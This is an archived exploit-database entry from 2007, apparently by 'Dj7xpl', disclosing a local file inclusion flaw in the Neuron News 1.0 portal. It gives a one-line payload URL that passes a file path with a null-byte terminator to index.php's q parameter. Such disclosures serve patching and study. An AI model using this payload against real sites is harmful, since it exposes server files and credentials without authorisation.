id: 2157
date: 09/20/2007
title: neuron news 1.0 (index.php q) Local File Inclusion Vulnerability
author: Dj7xpl
cves: 

================================================================
neuron news 1.0 (index.php q) Local File Inclusion Vulnerability
================================================================



                      \\\|///
                    \\  - -  //      Y! Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Neuron News 1.0
              Download :  http://downloads.localhost.be/scripts/neuronnews.zip
	      Author   :  Dj7xpl
	      Type     :  Local File Inclusion
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln :

http://[TARGET]/[PATH]/index.php?q=[Local File]%00


+---------------------------------------------------------------------------------------------+



#  0day.today [2023-03-23]  #